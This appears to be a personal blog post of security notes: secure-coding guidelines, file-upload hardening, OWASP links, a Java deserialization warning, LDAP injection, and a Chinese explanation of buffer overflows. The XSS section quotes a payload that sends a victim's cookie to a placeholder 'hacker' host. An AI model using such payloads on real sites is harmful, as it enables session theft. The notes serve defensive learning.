Tuesday, September 15, 2015

Security Miscs



HPE Security Fortify Static Code Analyzer (SCA)
http://www8.hp.com/us/en/software-solutions/static-code-analysis-sast/
https://www.owasp.org/index.php/Source_Code_Analysis_Tools

https://github.com/thoughtbot/guides/tree/master/security
  • Use HSTS headers to enforce HTTPS traffic.
  • Use secure cookies.
  • Avoid protocol-relative URLs.
  • Don't store passwords in plain text.
  • Don't hash passwords using a reversible cipher.
  • Don't hash passwords using a broken cipher, such as MD5 or SHA1.
  • Don't accept passwords or session tokens over HTTP.
    PGP and GnuPG
  • Use a PGP signature in an email if you want somebody to trust that you wrote it.
  • Use PGP to check email signatures if you want to know who wrote it.
  • Use PGP to encrypt emails if you want to be sure nobody but the recipient is reading it.
  • Use ultimate trust for your own keys.
  • Use full trust for keys you have verified in person or via a secure video chat.
  • Don't share your private key with anyone, including services like Keybase.
  • Keep at least one backup of your private key and revocation certificate in a secure location, such as a thumb drive.

  • Use a tool like pwgen or 1password to generate random passwords.
  • Use a tool like GnuPG to encrypt passwords if you need to share them with somebody.
Unrestricted File Upload
  • Never accept a filename and its extension directly without having a white-list filter.
  • It is necessary to have a list of only permitted extensions on the web application. And, file extension can be selected from the list. For instance, it can be a “select case” syntax (in case of having VBScript) to choose the file extension in regard to the real file extension.
  • All the control characters and Unicode ones should be removed from the filenames and their extensions without any exception. Also, the special characters such as “;”, “:”, “>”, “<”, “/” ,”\”, additional “.”, “*”, “%”, “$”, and so on should be discarded as well. If it is applicable and there is no need to have Unicode characters, it is highly recommended to only accept Alpha-Numeric characters and only 1 dot as an input for the file name and the extension; in which the file name and also the extension should not be empty at all (regular expression: [a-zA-Z0-9]{1,200}\.[a-zA-Z0-9]{1,10}).
  • Limit the filename length. For instance, the maximum length of the name of a file plus its extension should be less than 255 characters (without any directory) in an NTFS partition.
  • It is recommended to use an algorithm to determine the filenames. For instance, a filename can be a MD5 hash of the name of file plus the date of the day.
  • Uploaded directory should not have any “execute” permission.
  • Limit the file size to a maximum value in order to prevent denial of service attacks (on file space or other web application’s functions such as the image resizer).
  • Restrict small size files as they can lead to denial of service attacks. So, the minimum size of files should be considered.
  • Use Cross Site Request Forgery protection methods.
  • Prevent from overwriting a file in case of having the same hash for both.
  • Use a virus scanner on the server (if it is applicable). Or, if the contents of files are not confidential, a free virus scanner website can be used. In this case, file should be stored with a random name and without any extension on the server first, and after the virus checking (uploading to a free virus scanner website and getting back the result), it can be renamed to its specific name and extension.
  • Try to use POST method instead of PUT (or GET!)
  • Log users’ activities. However, the logging mechanism should be secured against log forgery and code injection itself.
  • In case of having compressed file extract functions, contents of the compressed file should be checked one by one as a new file.
Top 10 Lists for Designing and Writing Secure and Safe Software
OWASP Top Ten 2013 Project
https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents

https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/
IEEE Top Design Flaws
http://cybersecurity.ieee.org/center-for-secure-design/avoiding-the-top-10-security-flaws.html

https://dzone.com/articles/java-serialization-vulnerability-threatens-million
ObjectInputStream in = new ObjectInputStream( inputStream );
     return (Data)in.readObject();
The problem is that there’s no way to know what you’re deserializing before you’ve decoded it.  So an attacker can serialize a bunch of malicious objects and send them to your application.  Once you call readObject(), it’s too late.  In some ways it’s like an XXE problem, where an attacker can use a malicious DOCTYPE to generate attacks during XML parsing.  But in this case, there’s no easy way to turn off DOCTYPE processing. 
XSS
http://www.veracode.com/security/xss
For example, the HTML snippet:
<title>Example document: %(title)</title>
is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
sitting on the other end, at the web server, you will be receiving hits where after a double space is the user's cookie. If an administrator clicks the link, an attacker could steal the session ID and hijack the session.

LDAP Injection
http://searchsoftwarequality.techtarget.com/definition/LDAP-injection

https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OTG-INPVAL-006)
https://docs.kentico.com/display/K7SG/Lightweight+Directory+Access+Protocol+(LDAP)+injection

http://docs.spring.io/spring-ldap/docs/current/reference/
In addition to simplifying building of complex search parameters, the LdapQueryBuilder and its associated classes also provide proper escaping of any unsafe characters in search filters. This prevents "ldap injection", where a user might use such characters to inject unwanted operations into your LDAP operations.
http://segmentfault.com/a/1190000004030596

缓冲区溢出

例如:把10个字节的数据存入到只分配了8个字节的空间缓冲区

原理:

简单地说,缓冲区溢出就是向一个有限空间的缓冲区拷贝了过长的字符串,覆盖相邻的存储单元,这将会引起程序运行失败。
因为变量保存在堆栈当中,当发生缓冲区溢出的时候,存储在堆栈中的函数返回地址也会被覆盖,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。
一个程序在内存中通常分为程序段,数据段和堆栈段3部分。动态数据则通过堆栈来存放。
当程序中发生函数调用时,计算机做如下操作:
  • 首先把参数压入堆栈;
  • 然后保存指令寄存器(IP)中的内容作为返回地址(RET);
  • 第三个放入堆栈的是基址寄存器(BP):然后把当前的栈指针(SP)拷贝到BP,作为新的基地址;
  • 最后为本地变量留出一定空间,把SP减去适当的数值。
BP RET被多余的str覆盖,而覆盖之处恰好就是想要执行程序的入口!
利用空指针加快猜中的可能性

Github Hacking
http://tech.163.com/16/0122/06/BDTP3FUP000915BD.html
history.pushstate()是HTML5引入的API,pushState将指定的URL添加到浏览器历史里,存储当前历史记录点。 当 i<100000 的时候会循环的将 total记录到浏览器历史里面,重复多了,浏览器就承受不住了,自然就崩了。

Labels

Review (572) System Design (334) System Design - Review (198) Java (189) Coding (75) Interview-System Design (65) Interview (63) Book Notes (59) Coding - Review (59) to-do (45) Linux (43) Knowledge (39) Interview-Java (35) Knowledge - Review (32) Database (31) Design Patterns (31) Big Data (29) Product Architecture (28) MultiThread (27) Soft Skills (27) Concurrency (26) Cracking Code Interview (26) Miscs (25) Distributed (24) OOD Design (24) Google (23) Career (22) Interview - Review (21) Java - Code (21) Operating System (21) Interview Q&A (20) System Design - Practice (20) Tips (19) Algorithm (17) Company - Facebook (17) Security (17) How to Ace Interview (16) Brain Teaser (14) Linux - Shell (14) Redis (14) Testing (14) Tools (14) Code Quality (13) Search (13) Spark (13) Spring (13) Company - LinkedIn (12) How to (12) Interview-Database (12) Interview-Operating System (12) Solr (12) Architecture Principles (11) Resource (10) Amazon (9) Cache (9) Git (9) Interview - MultiThread (9) Scalability (9) Trouble Shooting (9) Web Dev (9) Architecture Model (8) Better Programmer (8) Cassandra (8) Company - Uber (8) Java67 (8) Math (8) OO Design principles (8) SOLID (8) Design (7) Interview Corner (7) JVM (7) Java Basics (7) Kafka (7) Mac (7) Machine Learning (7) NoSQL (7) C++ (6) Chrome (6) File System (6) Highscalability (6) How to Better (6) Network (6) Restful (6) CareerCup (5) Code Review (5) Hash (5) How to Interview (5) JDK Source Code (5) JavaScript (5) Leetcode (5) Must Known (5) Python (5)

Popular Posts